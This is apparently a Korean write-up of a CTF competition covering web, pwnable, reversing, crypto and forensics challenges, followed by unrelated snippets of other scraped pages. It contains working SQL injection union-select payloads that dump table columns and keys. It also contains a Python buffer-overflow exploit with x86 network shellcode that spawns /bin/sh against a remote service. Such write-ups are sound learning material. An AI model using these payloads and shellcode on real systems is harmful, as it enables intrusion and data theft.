나의친구포토샵으로열심히합성질도해보고색도칠해보고삽질을했으나, 답이뜨지않았습니다. 한참을고민하다가나의친구포토샵으로색을반전시켰더니답이등장했습니다. Warming up 03 pcap 패킷파일이주어졌습니다. 처음에는 MITM 공격을당했다고해서 SSL Data를해킹 당한줄알고한참
|
|
- 정윤 구
- 7 years ago
- Views:
Transcription
1 Write-up Warming up 1 쓸게없네요쿠키보세요 김희중 Warming up 2 파일을열면위도와경도가주어진사진한장이나옵니다. 겠지만, 일단지도입니다. 어딜봐서지도인지는잘모르 왠지 36과 128 을보아하니위도와경도값같습니다. 우리의친구구글 Maps에서검색을 하니 고수동굴이짜잔하고나타납니다. 끝인줄알았건만, 고수동굴을비밀번호로입력하니또하나가등장합니다. 이번에는 QR Code 가등장하지만, Recognition 부분의색이이상합니다. 그래서깔끔하게
2 나의친구포토샵으로열심히합성질도해보고색도칠해보고삽질을했으나, 답이뜨지않았습니다. 한참을고민하다가나의친구포토샵으로색을반전시켰더니답이등장했습니다. Warming up 03 pcap 패킷파일이주어졌습니다. 처음에는 MITM 공격을당했다고해서 SSL Data를해킹 당한줄알고한참을찾았으나, 뭔가너무멀리짚은것같아서간단하게생각해보기로했 습니다. 처음한것은 Hierarchy Statics 를보는것이였습니다. HTTP 에서많은통신을한것이보입니다. 그러므로 HTTP를복구해주는천사같은버튼인 Export Objects 로통째로뽑아봅니다. 근데별다른사진은없어보이고이상한파일들이 조금섞여있습니다. 예전에 pcap 관련문제를풀때에파일을복구해도뒤에 GET Parameter 가존재한채로통신하면뒤에확장자가따라붙는것이기억나모든파일의 GET Parameter를제거하여보니 HEYMAN.jpg 라는파일이등장하면서, 여기로오라면서얘 기합니다. Exif 태그등에위도경도를한참찾았으나없습니다. 그럴때에는우리의최고 의포렌식툴 Strings 를이용합니다.
3 글씨가멋있군요그나저나 뭔가 EOF 부분에 blog.naver.com/xlej1234 라는링크가어렴풋이보입니다. 들어가니사진 두장이등장하고, 두사진을이어서보면키가등장합니다.
4 Warming up 04 사진파일이하나등장하는데, 뭔가이상합니다. 분명히사진크기는작은데파일은너무 큽니다. 뒤쪽파일에뭔가숨겨져있는것이아닌가생각하고스크롤을쭉쭉내리다보니 End of Image라는문구와함께 Exe 로복구하라고합니다. 복구하게되면 alzip exe파일이 등장합니다. 그런데파일을열어도별다른게없었습니다. 원본사이트에들어가서원본이미지를다운 받아도별다른차이가없었습니다. 그래서알집파일에뭔가숨겨져있구나싶어서리버싱 을시작했습니다. 그러고보니 z0.jpg 라는파일도함께압축이해제되는것을찾았습니다. 그리고나서어디로갔을까생각을하니숨은파일을켜보니깜짝등장했습니다. 이번에도 반전된 QR Code 가등장하며들어가면사이트와함께키가존재합니다. Warming up 05 Python 으로똑같이짜줍니다. 다시짜려니까헷갈려서몇번틀렸네요. result = 0 dest = [93, 58, 44] for Num in xrange(2,5): Mul=1 for i in xrange(1,dest[num-2]+1): Mul = Mul * Num result = result + Mul a = b = c = 0
5 c = a ^ b result = result + c print hex(result) Web 100 들어가면 ID와 Name 입력창이뜹니다. guest/guest를해서로그인을하니쿠키값에뭔가 가남습니다. Base64*Base64 꼴로되어있는데, id*id 값, name*name 값꼴로되어있습니다. 그래서 admin으로접속하는것이목표겠다싶어 b64(id)*b64(admin), b64(name)*b64(admin) 을했더니이름만뜨고되지않습니다. 뭔가있다싶어다른쪽으로 좀파다보니디렉토리리스팅이되는것을볼수있습니다. log.txt가남는걸보니뭔가가 있습니다. 그래서 Log injection 을시도했습니다만별다른효과를거두지못했습니다. 좀기 다리니힌트가나와서풀었습니다. 관리자라는힌트였고, 한글관리자, administrator 게싱 도중에 administrator 가풀렸습니다. 또 b64 형식으로되어있었고, b64를풀어서키를인증 하면됩니다. Web 200 게시판사이트가뜹니다. 냄새에서부터 SQL Injection 이납니다. 그래서 Q&A 게시판에들 어가게시판 URL에있는 q_no 에바로시도해봅니다. admin 키를뽑는경우가대부분의유 형입니다. union을이용해 Column 개수를올려가며 Column 개수를맞춥니다. 그후테이블 이름을맞춰야하는데일단시도하기전에게싱을해봅니다. 테이블이름은 users로해두고 일단첫시도를했는데성공합니다. 아싸 ' union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 0, 1),4,5,6,7% ' union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 1, 1),4,5,6,7% ' union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 2, 1),4,5,6,7% ' union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 3, 1),4,5,6,7% ' union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 4, 1),4,5,6,7%23 userid, key1, key2, key3, key4 가뜹니다 ' union select 1,2,(select key1 from users),4,5,6,7% ' union select 1,2,(select key2 from users),4,5,6,7% ' union select 1,2,(select key3 from users),4,5,6,7% ' union select 1,2,(select key4 from users),4,5,6,7%23
6 를해봅니다. 그러니 key3에서 md5 같은값이뜨고그값인 (2e67e d778550f4a ) 이 key 값이었습니다. Web 300 ( 뭔가문제가바뀌었네요, 바뀐문제로다시풀겠습니다.) and, or, 공백등을우회해야합니다. 공백문제는괄호로해결하고숫자를막기때문에함수를떡칠해서수를연산하여해결할 수있습니다. 예전에풀었을땐분명히 ID에입력해서 Injection 했던기억이있는데문제가수정되어버 렸군요. 수정된문제는 ID의막는값을알수없어서 PW 에걸어서해결해야합니다. md5가걸려있다고해도쿼리문을강제로닫아 md5 가진행되지않도록할수있다. ')or(length('as')>length('a'))&&(level<>(length('a')-length('a'))+ < )or(2>1)and(level<>(0))+ > Pwnable 100 Web 에서사용하는라이브러리를분석하는것이목표입니다. 처음에나왔을때파일이깨져 있어서 100 치곤수준이좀높다싶었는데다행히도잘못된파일이었군요. v5 = getenv("http_user_agent"); for ( i = 0; i <= 1; ++i ) { v6 = strchr(v5, 47) + 1; v8 = atoi(v6); v0 = strchr(v5, 40); if (!strncmp(v0 + 1, "yoyos", 5u) ) { puts("u R Operating yoyos<br />\r"); v1 = strchr(v5, 40); if (!strncmp(v1 + 8, "WOW101", 6u) ) { puts("u R Playing WOW_LOL<BR />\r"); v2 = strchr(v5, 40); if (!strncmp(v2 + 20, "PwningBrowser/ ", 0x15u) ) { puts("u R Browsing PwningBrowser<BR />\r"); for ( j = 0; j <= 80; ++j ) *((_BYTE *)&v4 + j) = v5[j]; if ( v8 == 7 ) *((_BYTE *)&v4 + j) = v5[j]; if ( *((_BYTE *)&v4 + j) == 70 ) sub_80488cf(); return sub_80486db();
7 저코드를만족시켜야키가나오는것같습니다. strchr 함수는문자열의위치를반환해주는함수로써, HTTP_USER_AGENT 에값을입력하여야합니다. 1. / 의위치를가져오는것이먼저인데, 뒤에있는버전값을수정하면 부분으로인 해서 3 이들어가지기때문에그부분전에 / 를먼저입력시켜야합니다. 그후값을 atoi 하여수로바꾸는데 7 이여야합니다. 2. 괄호다음글자는 yoyos, 8글자뒤는 WOW101, 20글자뒤는 PwningBrowser/ 이여야합니다. 3. 괄호이후값을버퍼에옮긴후, 80번째글자가 F 인가확인합니다. 모두를만족시키는값은 /7(yoyOSFFWOW101FFFFFFPwningBrowser/ FFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFF 입니다. U R Operating yoyos<br /> U R Playing WOW_LOL<BR /> U R Browsing PwningBrowser<BR /> gksmfqhflaktlsmstmfrlgud<html> Pwn 200 맨처음에 Auth Key 를확인하여올바른접근인지확인합니다. 그후, 2번입력하게되는 데, Buffer의크기는 101 이지만, 실제로입력할수있는값은 102byte 입니다. Stack을보 게되면 msg2 를위한버퍼의크기를입력할수있는값을바꿔버릴수있습니다. char buf; // [sp+23h] [bp-65h]@1 unsigned int8 v3; // [sp+87h] [bp-1h]@1 buf의크기는 101이고자세히 0x87-0x23을하면쓰레기값없이 buf 버퍼바로위에 v3 값이존재하는것을볼수있습니다. return recv(fd, &buf, v3, 0); 이곳에서 Buffer Overflow 가일어날수있는취약점이존재합니다.
8 shellcode = "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x68\x3a\xea\xa1\x67\x66\ x68\x22\xb8\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x 31\xc9\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03\x75\xf0\x31\xc0\x50 \x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80" ret = 0xbf while ret <= 0xc : time.sleep(0.05) print hex(ret) sock = socket(af_inet, SOCK_STREAM) sock.connect((" ",7777)) msg = sock.recv(1024) sock.send("diselogoscqresffpsh") msg = sock.recv(1024) sock.send("\x90"*101+"\xff") msg = sock.recv(1024) sock.send("\x90"*105+struct.pack("<i",ret)+"\x90"*(130-len(shellcode))+shellcode) sock.close() ret += 1 Remote 이므로정확한버퍼가위치하는위치를모르기때문에 Brute force로주소를모두해봅니다. 0xbf 다음부터진행하기때문에그렇게길게걸리지는않습니다. Pwn 300 유형자체는 200 과비슷한데, 기능이여러가지생겼군요. Exploit 은대회폭풍수면후운지하고파일정리하던도중날려버렸습니다. T.T 방법은 200 과같습니다. Auth Key 날려주고, Buffer 하나가후에 recv 크기가되는데꽉 채워주고, Buffer Size가 204인 Buffer에 SFP까지 208만큼싸주고쉘코드를날려주면됩니 다. 또 Remote이기때문에 Brute Force 해주어야합니다. Bin 100
9 xap 파일을줍니다. Windows Phone 이없는관계로동적디버깅은못하겠군요. 그러므로 정적디버깅으로진행합니다. xap 파일은일반적인 App들과비슷하게 PK 로시그내쳐가시작하는압축파일입니다. 그러 므로압축을해제하여줍니다. Windows Phone은 C#, Silverlight 등과같은언어로개발하는경우가많기에이는 IL Disassembler 등으로 Disassemble 이가능합니다. 우리의 IL 친구.net Reflector 로열어주면됩니다. 적절히분석하다보면키를입력하는방식이버튼과 수있습니다. Text 변경이벤트에서오는것을볼 drivec와 drived 는사용자가입력하는값이고, 그이전에값을한번더비교합니다. "CIH")) private void PassCode_TextChanged(object sender, TextChangedEventArgs e) { if ((this.drivec.get_password() == "Y2K") && (this.drived.get_password() == { string str = "ecnis"; byte num = Convert.ToByte("11", 2); if (this.passcode.get_text() == string.concat(new object[] { this.drived.get_password(), "_YI", this.charset[5], this.charset[0x13], new string(enumerable.toarray<char>(enumerable.reverse<char>(str.tochararray()) )), 200, num, "_", this.drivec.get_password() )) 2); { Uri uri = new Uri("/Auth.xaml?PassCode=" + this.passcode.get_text(), base.get_navigationservice().navigate(uri); this.passcode.set_visibility(0); string.concat 으로문자열을합친후비교하는것을보아저합친값을알아내야합니다. 1. this.drived.get_password() 는위에서비교하는 CIH 일것입니다. 2. _YI 3. Charset 값은 ctor 생성자에존재합니다. this.charset = new char[] { ; '2', '0', '1', '2', '_', 'S', 'e', 'c', 'u', 'r', 'i', 't', 'y', 'F', 'i', 'r', 's', 't', '_', 'F', 'i', 'g', 'h', 't', 'i', 'n', 'g', '!', '!', '!', ':', ')' 이를이용하여 [5] 값인 S와 0x13 값인 F 를가져옵니다. 4. 위에있는 str 값을가져온후 Reverse 합니다. 그값은 since 입니다.
10 5. 200과 2진수값 11인 3 을합칩니다. 6. 언더바 7. drivec 값인 Y2K 값을합칩니다. 이를모두합치면 Bin 200 뭔가파일을실행시키면 CIH_YISFsince2003_Y2K 입니다. Show Time 이라면서파일이왕창생성됩니다. ID와 PW 를입력받는데, 리버싱하면이값을정말간단하게알수있습니다. PW는 Nyan&Tom 인데, ID 값은지금기억이안나지만, 이것이중요한것이아닙니다. 한참 ID와 PW를파면서삽질하다가모든알고리즘이너무비슷해서딱히알아낼것이없 었습니다. 그러다가 볼수있습니다. intenila.exe를분석하던시점에프로그램진입점에서여러가지연산을하는것을 v3 = dword_ ; dword_ = ; dword_ = v3; if ( v3 == dword_40301c / 2 ) { v3 += ; word_40303a = 14906; dword_ = v3; dword_40301c = ; if ( v3 == ) { v4 = byte_403034; dword_ = dword_403030; byte_ = word_40303a; dword_ = ; LOBYTE(word_40303A) = v4; byte_ = HIBYTE(word_40303A); HIBYTE(word_40303A) = byte_403035; byte_ = byte_403394; sub_401140(); exit(-1); 읽기가귀찮다면동적디버깅을해줍시다. Olly로올려주니 DIV EAX 에서뭔가가걸립니다. Exception 이발생하는데, 고의로걸어준 듯한느낌이듭니다. 하지만딱히후에 Stack이 EAX와관련하여수정되는부분도없고 EAX 값은곧파기되기에 EIP 를강제수정하여다음라인으로강제진행해줍니다.
11 생긴게 Auth Key 같이값이바뀌었습니다. 이를인증하면답이등장합니다. Crypto 100 이상한여자와 Mr. 아베, 마이클잭슨과토끼가춤을추고있습니다. 그리고대화문이밑에등장하는데뭔지는모르겠습니다. 그러므로우리는 Google 에들어갑니다. 우리가저사진을보고알수있는연관된사실은 1. Stick man 2. Dancing 3. Crypto 검색해줍시다. Stick Man Dancing Crypto로 그러니뭔가암호화방식이등장합니다. 음, 아무래도 1:1 대응하는단순치환암호같습니다. 그러므로한글자씩대칭시켜줍니다. 그렇게해주면 EXCUSEMEPLEASEGETOUTOFHERE 가나옵니다. 링크가등장합니다.
12 ( 해당로그가없다고하여풀이를매우세세하게쓰겠습니다.) 첫문장을보면영어로대화를합니다. 그러므로 일단그것을전제 intenila 는영어를사용할수있다는사실을알수있습니다. 1 로하여영어로는대화가무리없음을알아냅니다. 그후 Passing Bug의모든문자열을 x 로바꾸어봅니다. ]45; 5(8 :? ;5076*3 52?;? 46! * 2?3. 4 ] :? 7* ]?( 05*3?538? : 75: * 806);8 35(5008*. 8 6) 5?;478: 1 ;46) );538. 6) 6; (634;? 6 50) 38*6?) ^^ 2:8 2:8. xxxx xxx xxx xxxxxxx xxxxx? xx! x xx x xxxxxx xxx. xxx xx xxx xxxx xxx xxxxxxxx? xxxx xxxx xxxx xxxxxxxxxxxxxxxxxxxxx xx xxxxxxx xx xxxx xxxxx. xx xx xxxx? x xxxx xxxxxx ^^ xxx xxx. 문장의형태를보아한글자씩등장하는단어들이있는데많은자연어들중에서도한글자 씩문장에존재할수있는자연어는영어의관사들, 혹은특정주어입니다. (a, an) (I) 여기서전제 2인 Passing bug 가사용한언어는영어를특정값으로변환한것입니다. 특정단어들이여러번반복하는것을발견할수있는데, 이는문장마다특정 IV 같은값 이존재하지않기에단순치환암호임을전제 다시정리하면 3 으로둘수있습니다. 1. Intenila 는영어를사용할수있고, 특수문자언어도사용할수있다. 2. Bug 는특수문자언어만사용할수있는데, 문장이존재하는위치와단어의길이들을추
13 정해보면영어일가능성이크다. 3. 단순치환암호이기때문에한글자씩맞추어보면된다. 맨마지막문장은마치는문장이기에같은글자가 3번반복하는사실도알아낼수있기에 bye bye 로게싱해볼수있습니다. 또한 Bug의문장후 Intenila의반응은이사실을모르 고있다가알게된것입니다. 그리고 Aha! 는이전에 Bug가사용한문장을이해했다는것이 되며, 해당언어로바꾼것을보아 Bug가저말을이해할수없다는사실을알게된것이 며그러므로저문장은아마도 무슨말인지모르겠다. 라는문장일가능성이큽니다. 그렇기에영어의 수있습니다. What are you talking about? 으로문자열을대칭해보면딱맞는것을볼 주어진정보들로복호화를진행해보면 ]45; 5(8 :? ;5076*3 52?;? What are you talking about? 4800! *;8*605! hello! i am intenila! 46! * 2?3. 4 ] :? 7* ]?( 05*3?538? hi! i a? a gol?en bug. how?o you know our language?,?); *6?)^^?ust i am geniu??^^ : 75: * 806);8 35(5008*. 8 6) 5?;478: 1 ;46) );538. 6) 6; (634;? haha okay okay no?eliste?garallen?oe i? authkey o? thi??tage. i? it right? 이정도의빈칸이라면기초적인영어들만알아도충분히읽을수있습니다. Auth Key 부분을알았으면저앞부분을어떻게든읽어내야합니다.
14 구글에서알아서연관검색어로이름까지알려줍니다. Edgar Allan Poe에대해조금더검 색해보면 Novelist( 소설가) 임을알수있습니다. 도중에이유는모르겠지만 Allan Poe가올 바른이름이네요. Crypto 200 DES 문제가나옵니다. 다른대회에서나왔던문제들은 Weak Key와같은취약점을이용하 여해결하는경우가있었는데, 그내용인줄알고운영진분들께질문을드렸으나차갑게 아니라는대답을받고삽질을시작했습니다. 풀던도중갑자기기억난내용이 Codegate 2012 Pre-qual에서나왔던 DES 문제였습니다. 그문제에서는평문과키를 NOT 연산을거친후에도결과값이 NOT이나왔던사실이기 억이났습니다. 이와같은방법으로풀면방법이있지않을까? 해서평문을 NOT 연산해보니 IUisVeryVeryCute 가나오는데, 이는예제에서나왔던평문을 NOT 연산한결과였습니다. 그래서 Key 값을 NOT 연산한후인증하니인증되었습니다. Crypto 300 나의예쁜에이핑크찡의노래와함께사진이주어졌.. 지만제대로나오질않는군요. 그래서 보니파일 2 개가합쳐져있는것같습니다. 그래서간단한 Python 코드로둘을쪼개줍니다.
15 a = open("target","rb") a1 = open("a1","wb") a2 = open("a2","wb") data = a.read() cnt = 0 for i in data: if(cnt%2==0): a1.write(i) else: a2.write(i) 파일을쪼개보면진짜나의사랑에이핑크찡의사진과쪽지들이나오는데, Enigma 냄새가납니다. 쪽지들값은 Enigma Simulator를다운받고생각을해보니 Key code 가없잖아! 절망하며 Key Code들을 찾으러여행을떠납니다. 뭔가가숨겨져있을거라생각하니아까나의사랑에이핑크찡의노래가생각납니다. 그안 에노래가있겠지, 해서카빙을떠봐도안나옵니다. 그래서뭔가숨기는방법이있었겠지, 하며파일에 EOF 부분을보니! Image 파일이거꾸로있군요! 또복구해줍시다. a = open("t2","rb") b = open("res2","wb") data = a.read() d2 = data[::-1] b.write(d2) b.close() 적당히 EOF를찾아서깔끔하게복구해주면드디어 Key-code 가나오고, 설정에맞추어 Emulator로돌려주면 Key 가등장! 좀작아서힘들지만한참고생해서키를찾아돌리면됩니다.
16 Forensics 100 Victim의운영체제는 MAC OS X 입니다. 그렇기에 USB를넣 으면 System.log 에들어가게되는데, 그로그를위주로샅샅이 뒤지다보면정보를얻을수있다. 막판운지의힘으로인해서까먹어버렸다. 지금시간이 11:40이 라빨리써야할것같은데늦을것같다. Forensics 200 I-Doser 이라는압축파일을줍니다. 보아하니노래를주는것 같은데엄청나게삐빅대기만합니다. 그런데특정주파의음만 반복하는것을보아아마도 Spectrogram 같습니다. 그래서우리의최고의음악툴인 Goldwave에넣어주고보면 Key에대해설명하는 Spectrogram 이등장합니다. (R+ex+vuz) 국가명5 글자_ (R+ex+vuz) 그림5 글자_ 동물6 글자_ 글자4글자 대문자로인증해야합니다. R+ex+vuz가무슨의미인가해서동시에재생하게끔 GoldWave 찡으로 Mix 버튼을눌러 3 개의음을전부합쳐주니 DOKDO 가등장합니다. 나머지하나는무엇인가, 해서다시 Spectrogram 을봐도뭔지를모르겠습니다. 도중도중에 동물벽화같이붉은점들이춤추길래그동물인가해서생각을해봐도, 빨리재생을해서 그림을하나로보아도도무지답이안나왔습니다. 그러던도중단비처럼저에게힌트가내 려왔고 SSTV 라는힌트를받았습니다. SSTV를검색해보니 Radio 음성을 RGB로바꾸어주 는것같습니다. 인터넷에서 Tool 을다운로드받고음을재생해주니사진이등장합니다.
17 원숭이와 인증키는 Forensics 300 DUDE 같습니다. KOREA_DOKDO_MONKEY_DUDE 입니다. 돈사진 2 개가주어집니다. 나의알씨로두사진을비교하다우연히두사진의픽셀값이 조금다른것을보았습니다. 그래서간단히 Python 코드로복구합니다.
18 import Image diff = Image.open("diff.bmp") orig = Image.open("origin.bmp") width = 1280 height = 960 newone = Image.new('RGB', (width, height)) for j in xrange(0,height): for i in xrange(0,width): p1 = diff.getpixel((i,j)) p2 = orig.getpixel((i,j)) if(p1 == p2): newone.putpixel((i,j), (255,255,255)) else: newone.putpixel((i,j),(0,0,0)) newone.save("res.jpg","jpeg")
19 이정도복구율이면볼만합니다. Key is If hack is Not Fun, why do ha?? 인데, 뒷부분이안보여서문장에맞게끔적당히게싱해서 hack? 으로입력하니 Key가되었 습니다. Forensics 400 Windows 8의 Users 폴더가주어졌습니다. 일단얼굴책(Facebook) 앱을사용했다고하니 \between0&1\users\rexvuz\appdata\local\packages\microsoft.windowscommunicationsap ps_8wekyb3d8bbwe\ (Windows Coummnication Apps) 로가줍니다. 그후뭔가찾기도귀 찮으니, 우리의최고검색툴인 Windows 검색툴로 facebook 이라검색해봅니다. 메일 5 개가뜹니다. 안에는 Base64 로통신한흔적이있는데, 이를복호화해주면, 특정 php 이름을언급하며여기에들어가면인증할수있고비밀번호는필기장에뒀다고합니다.
20 필기장은 between0&1\users\rexvuz\documents\notes 에있습니다. 비밀번호는 H4-LUcKy 입니다. ( 하행운이군요.) 그럼이제링크를알아야하는데, 한참을찾고있다가최근검색목록을뒤졌습니다. 그러 다보니 FORENSICS_4U 라는이름부터의심해볼만한가치가있는파일도있습니다. 이를 보면, Temporailiy moved 가뜨며폴더이름도알아냈습니다. 대회서버IP/ 폴더이름/ 알아낸 php 이름으로접속하면 Apache Authentication이등장하며 ID 는 RExVuz 로, 비밀번호는 H4-LUcKy 를입력하니주석에비밀번호가존재합니다.
Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse
More information1
1 2 3 4 5 6 b b t P A S M T U s 7 m P P 8 t P A S M T U s 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Chapter 1 29 1 2 3 4 18 17 16 15 5 6 7 8 9 14 13 12 11 10 1 2 3 4 5 9 10 11 12 13 14 15
More informationMIC Check 1pt ( pwnable ) 아마도 문제 제목을 저렇게 낸 이유는 공연 전 마이크 테스트를 하는 것처럼 쉬운 것을 하나 풀면서 몸이라도 푸라고 저렇게 정한 게 아닐까 배점은 1 점짜리, pwnable.kr 의 cmd 와 비슷한 문제. - 2 -
Codegate 2016 Junior Prequal Write-up 5kyc1ad(전상현) - 1 - MIC Check 1pt ( pwnable ) 아마도 문제 제목을 저렇게 낸 이유는 공연 전 마이크 테스트를 하는 것처럼 쉬운 것을 하나 풀면서 몸이라도 푸라고 저렇게 정한 게 아닐까 배점은 1 점짜리, pwnable.kr 의 cmd 와 비슷한 문제. - 2
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationPowerPoint Template
JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것
More informationTcl의 문법
월, 01/28/2008-20:50 admin 은 상당히 단순하고, 커맨드의 인자를 스페이스(공백)로 단락을 짓고 나열하는 정도입니다. command arg1 arg2 arg3... 한행에 여러개의 커맨드를 나열할때는, 세미콜론( ; )으로 구분을 짓습니다. command arg1 arg2 arg3... ; command arg1 arg2 arg3... 한행이
More informationMicrosoft PowerPoint 웹 연동 기술.pptx
웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우
More informationPOC "Power of Community" 이민우 (lwmr)
POC2011 - "Power of Community" 이민우 (lwmr) pmskylove@gmail.com L_01 Q : 지성이는홈쇼핑을하다이상한페이지에접속하여악성코드에감염되었다! 악성스크립트에포함되어있는쉘코드가다운로드하는 URL 을찾아라! Twitter 의 2mart 라는힌트를보고 WireShark 의 File Export -> Objects -> HTTP
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationPowerPoint 프레젠테이션
실습 1 배효철 th1g@nate.com 1 목차 조건문 반복문 System.out 구구단 모양만들기 Up & Down 2 조건문 조건문의종류 If, switch If 문 조건식결과따라중괄호 { 블록을실행할지여부결정할때사용 조건식 true 또는 false값을산출할수있는연산식 boolean 변수 조건식이 true이면블록실행하고 false 이면블록실행하지않음 3
More information<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>
#include "stdafx.h" #include "Huffman.h" 1 /* 비트의부분을뽑아내는함수 */ unsigned HF::bits(unsigned x, int k, int j) return (x >> k) & ~(~0
More informationChapter 1
3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More information버퍼오버플로우-왕기초편 3.c언어에서버퍼사용하기 버퍼는 임시기억공간 이라는포괄적인개념이기때문에여러곳에존재할수있습니다. 즉, CPU 에도버퍼가존재할수있으며, 하드디스크에도존재할수있고, CD- ROM 이나프린터에도존재할수있습니다. 그리고앞의예제에서보신바와같이일반프로그램에도
버퍼는 임시기억공간 이라는포괄적인개념이기때문에여러곳에존재할수있습니다. 즉, CPU 에도버퍼가존재할수있으며, 하드디스크에도존재할수있고, CD- ROM 이나프린터에도존재할수있습니다. 그리고앞의예제에서보신바와같이일반프로그램에도존재할수있습니다. 이번시간엔프로그램에서버퍼를사용하는법, 그중에서도 C 언어에서버퍼를사용하는방법에대해배워보겠습니다. C 언어에서버퍼를사용하는가장쉬운방법은바로변수를선언하는것인데,
More informationInstall stm32cubemx and st-link utility
STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7
More informationMicrosoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx
CrackMe 15.exe (in Simples) 문제풀이 동명대학교정보보호동아리 THINK www.mainthink.net 강동현 Blog: johnghb.tistory.com e-mail: cari2052@gmail.com 1 목차 : 1. 문제설명및기본분석 --------------------------- P. 03 2 상세분석 ---------------------------
More informationPowerPoint Presentation
객체지향프로그래밍 클래스, 객체, 메소드 ( 실습 ) 손시운 ssw5176@kangwon.ac.kr 예제 1. 필드만있는클래스 텔레비젼 2 예제 1. 필드만있는클래스 3 예제 2. 여러개의객체생성하기 4 5 예제 3. 메소드가추가된클래스 public class Television { int channel; // 채널번호 int volume; // 볼륨 boolean
More informationDocsPin_Korean.pages
Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google
More information커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서
커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More informationMicrosoft Word - windows server 2003 수동설치_non pro support_.doc
Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로
More information4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona
이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.
More informationMicrosoft PowerPoint - chap13-입출력라이브러리.pptx
